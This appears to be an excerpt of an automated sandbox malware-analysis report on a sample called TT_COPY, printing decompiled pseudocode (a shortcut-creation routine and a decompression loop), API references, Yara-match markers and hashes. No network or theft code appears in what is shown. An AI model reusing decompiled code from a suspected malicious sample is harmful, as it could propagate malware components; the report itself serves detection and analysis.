                                                                                                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                                                            				_t52 =  *(_t107 - 0x20);
                                                                                                                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                                                            				_t101 = _t52 & 0x00008000;
                                                                                                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                                                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                                                            				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                                                            					E00402DA6(0x21);
                                                                                                                            				}
                                                                                                                            				_t56 = _t107 + 8;
                                                                                                                            				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                                                                                            				if(_t56 < _t83) {
                                                                                                                            					L14:
                                                                                                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                                                            					_push(0xfffffff0);
                                                                                                                            				} else {
                                                                                                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                                                                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                                                            					if(_t61 >= _t83) {
                                                                                                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                                                            						if(_t101 == _t83) {
                                                                                                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                                                                                            						}
                                                                                                                            						if(_t105 != _t83) {
                                                                                                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                                                            						}
                                                                                                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                                                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                                                            						if( *_t91 != _t83) {
                                                                                                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                                                            						}
                                                                                                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                                                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                                                            						}
                                                                                                                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                            					}
                                                                                                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                            						_push(0xfffffff4);
                                                                                                                            					} else {
                                                                                                                            						goto L14;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				E00401423();
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}






















                                                                                                                            0x004021b3
                                                                                                                            0x004021bd
                                                                                                                            0x004021c7
                                                                                                                            0x004021d1
                                                                                                                            0x004021dc
                                                                                                                            0x004021df
                                                                                                                            0x004021f9
                                                                                                                            0x004021fc
                                                                                                                            0x00402202
                                                                                                                            0x00402205
                                                                                                                            0x0040220f
                                                                                                                            0x00402213
                                                                                                                            0x00402213
                                                                                                                            0x00402218
                                                                                                                            0x00402229
                                                                                                                            0x00402231
                                                                                                                            0x004022e8
                                                                                                                            0x004022e8
                                                                                                                            0x004022ef
                                                                                                                            0x00402237
                                                                                                                            0x00402237
                                                                                                                            0x00402246
                                                                                                                            0x0040224a
                                                                                                                            0x0040224d
                                                                                                                            0x00402253
                                                                                                                            0x00402261
                                                                                                                            0x00402264
                                                                                                                            0x00402266
                                                                                                                            0x00402271
                                                                                                                            0x00402271
                                                                                                                            0x00402276
                                                                                                                            0x00402278
                                                                                                                            0x0040227f
                                                                                                                            0x0040227f
                                                                                                                            0x00402282
                                                                                                                            0x0040228b
                                                                                                                            0x0040228e
                                                                                                                            0x00402294
                                                                                                                            0x00402296
                                                                                                                            0x004022a0
                                                                                                                            0x004022a0
                                                                                                                            0x004022a3
                                                                                                                            0x004022ac
                                                                                                                            0x004022af
                                                                                                                            0x004022b8
                                                                                                                            0x004022be
                                                                                                                            0x004022c0
                                                                                                                            0x004022ce
                                                                                                                            0x004022ce
                                                                                                                            0x004022d1
                                                                                                                            0x004022d7
                                                                                                                            0x004022d7
                                                                                                                            0x004022da
                                                                                                                            0x004022e0
                                                                                                                            0x004022e6
                                                                                                                            0x004022fb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004022e6
                                                                                                                            0x004022f1
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInstance
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542301482-0
                                                                                                                            • Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                                                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                            • Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                                                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "0
                                                                                                                            • API String ID: 0-2890535875
                                                                                                                            • Opcode ID: 2e5c3a54a4b3b7168c04d935d1ffd8d1a1df4154d202ea4f7ce75817fd3e5fb8
                                                                                                                            • Instruction ID: e4b555323c6cf2d6682d1a6a93d5ef91222cb60db42d461b0a8ae21151526724
                                                                                                                            • Opcode Fuzzy Hash: 2e5c3a54a4b3b7168c04d935d1ffd8d1a1df4154d202ea4f7ce75817fd3e5fb8
                                                                                                                            • Instruction Fuzzy Hash: C131D435A083468FDB34AE398C597EB77E3EF98750F99C15ADC8957218D3309642CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "0
                                                                                                                            • API String ID: 0-2890535875
                                                                                                                            • Opcode ID: bd0649ebaf290c1c134a0e9504ae89976496abbeb59749b5c135f0fdaaef3dfc
                                                                                                                            • Instruction ID: 8ce347725ba93039f0bdaf319f812e822ee475ddd45a97b75c6c27aba94a5a20
                                                                                                                            • Opcode Fuzzy Hash: bd0649ebaf290c1c134a0e9504ae89976496abbeb59749b5c135f0fdaaef3dfc
                                                                                                                            • Instruction Fuzzy Hash: 712105316093868FEB399E3848943E77BE3EF96250F99819ACCC64B159C3309582D702
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00406D85(signed int __ebx, signed int* __esi) {
                                                                                                                            				signed int _t396;
                                                                                                                            				signed int _t425;
                                                                                                                            				signed int _t442;
                                                                                                                            				signed int _t443;
                                                                                                                            				signed int* _t446;
                                                                                                                            				void* _t448;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t446 = __esi;
                                                                                                                            					_t425 = __ebx;
                                                                                                                            					if( *(_t448 - 0x34) == 0) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L55:
                                                                                                                            					__eax =  *(__ebp - 0x38);
                                                                                                                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            					__ecx = __ebx;
                                                                                                                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            					__ebx = __ebx + 8;
                                                                                                                            					while(1) {
                                                                                                                            						L56:
                                                                                                                            						if(__ebx < 0xe) {
                                                                                                                            							goto L0;
                                                                                                                            						}
                                                                                                                            						L57:
                                                                                                                            						__eax =  *(__ebp - 0x40);
                                                                                                                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                                            						__ecx = __eax;
                                                                                                                            						__esi[1] = __eax;
                                                                                                                            						__ecx = __eax & 0x0000001f;
                                                                                                                            						if(__cl > 0x1d) {
                                                                                                                            							L9:
                                                                                                                            							_t443 = _t442 | 0xffffffff;
                                                                                                                            							 *_t446 = 0x11;
                                                                                                                            							L10:
                                                                                                                            							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                            							_t446[0x146] = _t425;
                                                                                                                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                                            							L11:
                                                                                                                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                                            							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                                            							E004074F4( *(_t448 + 8));
                                                                                                                            							return _t443;
                                                                                                                            						}
                                                                                                                            						L58:
                                                                                                                            						__eax = __eax & 0x000003e0;
                                                                                                                            						if(__eax > 0x3a0) {
                                                                                                                            							goto L9;
                                                                                                                            						}
                                                                                                                            						L59:
                                                                                                                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                                            						__ebx = __ebx - 0xe;
                                                                                                                            						_t94 =  &(__esi[2]);
                                                                                                                            						 *_t94 = __esi[2] & 0x00000000;
                                                                                                                            						 *__esi = 0xc;
                                                                                                                            						while(1) {
                                                                                                                            							L60:
                                                                                                                            							__esi[1] = __esi[1] >> 0xa;
                                                                                                                            							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                            								goto L68;
                                                                                                                            							}
                                                                                                                            							L61:
                                                                                                                            							while(1) {
                                                                                                                            								L64:
                                                                                                                            								if(__ebx >= 3) {
                                                                                                                            									break;
                                                                                                                            								}
                                                                                                                            								L62:
                                                                                                                            								if( *(__ebp - 0x34) == 0) {
                                                                                                                            									goto L182;
                                                                                                                            								}
                                                                                                                            								L63:
                                                                                                                            								__eax =  *(__ebp - 0x38);
                                                                                                                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            								__ecx = __ebx;
                                                                                                                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            								__ebx = __ebx + 8;
                                                                                                                            							}
                                                                                                                            							L65:
                                                                                                                            							__ecx = __esi[2];
                                                                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                            							__ebx = __ebx - 3;
                                                                                                                            							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                                                                            							__ecx =  *_t108;
                                                                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                            							__ecx = __esi[1];
                                                                                                                            							__esi[2] = __esi[2] + 1;
                                                                                                                            							__eax = __esi[2];
                                                                                                                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                                            								goto L64;
                                                                                                                            							}
                                                                                                                            							L66:
                                                                                                                            							while(1) {
                                                                                                                            								L68:
                                                                                                                            								if(__esi[2] >= 0x13) {
                                                                                                                            									break;
                                                                                                                            								}
                                                                                                                            								L67:
                                                                                                                            								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                                                                            								__eax =  *_t119;
                                                                                                                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                                            								_t126 =  &(__esi[2]);
                                                                                                                            								 *_t126 = __esi[2] + 1;
                                                                                                                            							}
                                                                                                                            							L69:
                                                                                                                            							__ecx = __ebp - 8;
                                                                                                                            							__edi =  &(__esi[0x143]);
                                                                                                                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                                            							__eax = 0;
                                                                                                                            							 *(__ebp - 8) = 0;
                                                                                                                            							__eax =  &(__esi[3]);
                                                                                                                            							 *__edi = 7;
                                                                                                                            							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                                            							if(__eax != 0) {
                                                                                                                            								L72:
                                                                                                                            								 *__esi = 0x11;
                                                                                                                            								while(1) {
                                                                                                                            									L180:
                                                                                                                            									_t396 =  *_t446;
                                                                                                                            									if(_t396 > 0xf) {
                                                                                                                            										break;
                                                                                                                            									}
                                                                                                                            									L1:
                                                                                                                            									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                                                                            										case 0:
                                                                                                                            											L101:
                                                                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                            											__eax = __esi[5];
                                                                                                                            											__esi[2] = __esi[5];
                                                                                                                            											 *__esi = 1;
                                                                                                                            											goto L102;
                                                                                                                            										case 1:
                                                                                                                            											L102:
                                                                                                                            											__eax = __esi[3];
                                                                                                                            											while(1) {
                                                                                                                            												L105:
                                                                                                                            												__eflags = __ebx - __eax;
                                                                                                                            												if(__ebx >= __eax) {
                                                                                                                            													break;
                                                                                                                            												}
                                                                                                                            												L103:
                                                                                                                            												__eflags =  *(__ebp - 0x34);
                                                                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                                                                            													goto L182;
                                                                                                                            												}
                                                                                                                            												L104:
                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                            												__ecx = __ebx;
                                                                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            												__ebx = __ebx + 8;
                                                                                                                            												__eflags = __ebx;
                                                                                                                            											}
                                                                                                                            											L106:
                                                                                                                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                            											__ecx = __esi[2];
                                                                                                                            											__eax = __esi[2] + __eax * 4;
                                                                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                                                                            											__eflags = __ecx;
                                                                                                                            											if(__ecx != 0) {
                                                                                                                            												L108:
                                                                                                                            												__eflags = __cl & 0x00000010;
                                                                                                                            												if((__cl & 0x00000010) == 0) {
                                                                                                                            													L110:
                                                                                                                            													__eflags = __cl & 0x00000040;
                                                                                                                            													if((__cl & 0x00000040) == 0) {
                                                                                                                            														goto L125;
                                                                                                                            													}
                                                                                                                            													L111:
                                                                                                                            													__eflags = __cl & 0x00000020;
                                                                                                                            													if((__cl & 0x00000020) == 0) {
                                                                                                                            														goto L9;
                                                                                                                            													}
                                                                                                                            													L112:
                                                                                                                            													 *__esi = 7;
                                                                                                                            													goto L180;
                                                                                                                            												}
                                                                                                                            												L109:
                                                                                                                            												__esi[2] = __ecx;
                                                                                                                            												__esi[1] = __eax;
                                                                                                                            												 *__esi = 2;
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            											L107:
                                                                                                                            											__esi[2] = __eax;
                                                                                                                            											 *__esi = 6;
                                                                                                                            											goto L180;
                                                                                                                            										case 2:
                                                                                                                            											L113:
                                                                                                                            											__eax = __esi[2];
                                                                                                                            											while(1) {
                                                                                                                            												L116:
                                                                                                                            												__eflags = __ebx - __eax;
                                                                                                                            												if(__ebx >= __eax) {
                                                                                                                            													break;
                                                                                                                            												}
                                                                                                                            												L114:
                                                                                                                            												__eflags =  *(__ebp - 0x34);
                                                                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                                                                            													goto L182;
                                                                                                                            												}
                                                                                                                            												L115:
                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                            												__ecx = __ebx;
                                                                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            												__ebx = __ebx + 8;
                                                                                                                            												__eflags = __ebx;
                                                                                                                            											}
                                                                                                                            											L117:
                                                                                                                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                            											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                            											__ecx = __eax;
                                                                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            											__ebx = __ebx - __eax;
                                                                                                                            											__eflags = __ebx;
                                                                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                            											__eax = __esi[6];
                                                                                                                            											__esi[2] = __esi[6];
                                                                                                                            											 *__esi = 3;
                                                                                                                            											goto L118;
                                                                                                                            										case 3:
                                                                                                                            											L118:
                                                                                                                            											__eax = __esi[3];
                                                                                                                            											while(1) {
                                                                                                                            												L121:
                                                                                                                            												__eflags = __ebx - __eax;
                                                                                                                            												if(__ebx >= __eax) {
                                                                                                                            													break;
                                                                                                                            												}
                                                                                                                            												L119:
                                                                                                                            												__eflags =  *(__ebp - 0x34);
                                                                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                                                                            													goto L182;
                                                                                                                            												}
                                                                                                                            												L120:
                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                            												__ecx = __ebx;
                                                                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            												__ebx = __ebx + 8;
                                                                                                                            												__eflags = __ebx;
                                                                                                                            											}
                                                                                                                            											L122:
                                                                                                                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                            											__ecx = __esi[2];
                                                                                                                            											__eax = __esi[2] + __eax * 4;
                                                                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                                                                            											__eflags = __cl & 0x00000010;
                                                                                                                            											if((__cl & 0x00000010) == 0) {
                                                                                                                            												L124:
                                                                                                                            												__eflags = __cl & 0x00000040;
                                                                                                                            												if((__cl & 0x00000040) != 0) {
                                                                                                                            													goto L9;
                                                                                                                            												}
                                                                                                                            												L125:
                                                                                                                            												__esi[3] = __ecx;
                                                                                                                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                                                            												__esi[2] = __eax;
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            											L123:
                                                                                                                            											__esi[2] = __ecx;
                                                                                                                            											__esi[3] = __eax;
                                                                                                                            											 *__esi = 4;
                                                                                                                            											goto L180;
                                                                                                                            										case 4:
                                                                                                                            											L126:
                                                                                                                            											__eax = __esi[2];
                                                                                                                            											while(1) {
                                                                                                                            												L129:
                                                                                                                            												__eflags = __ebx - __eax;
                                                                                                                            												if(__ebx >= __eax) {
                                                                                                                            													break;
                                                                                                                            												}
                                                                                                                            												L127:
                                                                                                                            												__eflags =  *(__ebp - 0x34);
                                                                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                                                                            													goto L182;
                                                                                                                            												}
                                                                                                                            												L128:
                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                            												__ecx = __ebx;
                                                                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            												__ebx = __ebx + 8;
                                                                                                                            												__eflags = __ebx;
                                                                                                                            											}
                                                                                                                            											L130:
                                                                                                                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                            											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                            											__ecx = __eax;
                                                                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            											__ebx = __ebx - __eax;
                                                                                                                            											__eflags = __ebx;
                                                                                                                            											 *__esi = 5;
                                                                                                                            											goto L131;
                                                                                                                            										case 5:
                                                                                                                            											L131:
                                                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                                                            											__edx = __esi[3];
                                                                                                                            											__eax = __eax - __esi;
                                                                                                                            											__ecx = __eax - __esi - 0x1ba0;
                                                                                                                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                                                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                                                            												__ecx = __eax;
                                                                                                                            												__ecx = __eax - __edx;
                                                                                                                            												__eflags = __ecx;
                                                                                                                            											} else {
                                                                                                                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                                                            												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                                                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                                                            											}
                                                                                                                            											__eflags = __esi[1];
                                                                                                                            											 *(__ebp - 0x20) = __ecx;
                                                                                                                            											if(__esi[1] != 0) {
                                                                                                                            												L135:
                                                                                                                            												__edi =  *(__ebp - 0x2c);
                                                                                                                            												do {
                                                                                                                            													L136:
                                                                                                                            													__eflags = __edi;
                                                                                                                            													if(__edi != 0) {
                                                                                                                            														goto L152;
                                                                                                                            													}
                                                                                                                            													L137:
                                                                                                                            													__edi = __esi[0x26e8];
                                                                                                                            													__eflags = __eax - __edi;
                                                                                                                            													if(__eax != __edi) {
                                                                                                                            														L143:
                                                                                                                            														__esi[0x26ea] = __eax;
                                                                                                                            														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                            														__eax = __esi[0x26ea];
                                                                                                                            														__ecx = __esi[0x26e9];
                                                                                                                            														__eflags = __eax - __ecx;
                                                                                                                            														 *(__ebp - 0x30) = __eax;
                                                                                                                            														if(__eax >= __ecx) {
                                                                                                                            															__edi = __esi[0x26e8];
                                                                                                                            															__edi = __esi[0x26e8] - __eax;
                                                                                                                            															__eflags = __edi;
                                                                                                                            														} else {
                                                                                                                            															__ecx = __ecx - __eax;
                                                                                                                            															__edi = __ecx - __eax - 1;
                                                                                                                            														}
                                                                                                                            														__edx = __esi[0x26e8];
                                                                                                                            														__eflags = __eax - __edx;
                                                                                                                            														 *(__ebp - 8) = __edx;
                                                                                                                            														if(__eax == __edx) {
                                                                                                                            															__edx =  &(__esi[0x6e8]);
                                                                                                                            															__eflags = __ecx - __edx;
                                                                                                                            															if(__ecx != __edx) {
                                                                                                                            																__eax = __edx;
                                                                                                                            																__eflags = __eax - __ecx;
                                                                                                                            																 *(__ebp - 0x30) = __eax;
                                                                                                                            																if(__eax >= __ecx) {
                                                                                                                            																	__edi =  *(__ebp - 8);
                                                                                                                            																	__edi =  *(__ebp - 8) - __eax;
                                                                                                                            																	__eflags = __edi;
                                                                                                                            																} else {
                                                                                                                            																	__ecx = __ecx - __eax;
                                                                                                                            																	__edi = __ecx;
                                                                                                                            																}
                                                                                                                            															}
                                                                                                                            														}
                                                                                                                            														__eflags = __edi;
                                                                                                                            														if(__edi == 0) {
                                                                                                                            															goto L183;
                                                                                                                            														} else {
                                                                                                                            															goto L152;
                                                                                                                            														}
                                                                                                                            													}
                                                                                                                            													L138:
                                                                                                                            													__ecx = __esi[0x26e9];
                                                                                                                            													__edx =  &(__esi[0x6e8]);
                                                                                                                            													__eflags = __ecx - __edx;
                                                                                                                            													if(__ecx == __edx) {
                                                                                                                            														goto L143;
                                                                                                                            													}
                                                                                                                            													L139:
                                                                                                                            													__eax = __edx;
                                                                                                                            													__eflags = __eax - __ecx;
                                                                                                                            													if(__eax >= __ecx) {
                                                                                                                            														__edi = __edi - __eax;
                                                                                                                            														__eflags = __edi;
                                                                                                                            													} else {
                                                                                                                            														__ecx = __ecx - __eax;
                                                                                                                            														__edi = __ecx;
                                                                                                                            													}
                                                                                                                            													__eflags = __edi;
                                                                                                                            													if(__edi == 0) {
                                                                                                                            														goto L143;
                                                                                                                            													}
                                                                                                                            													L152:
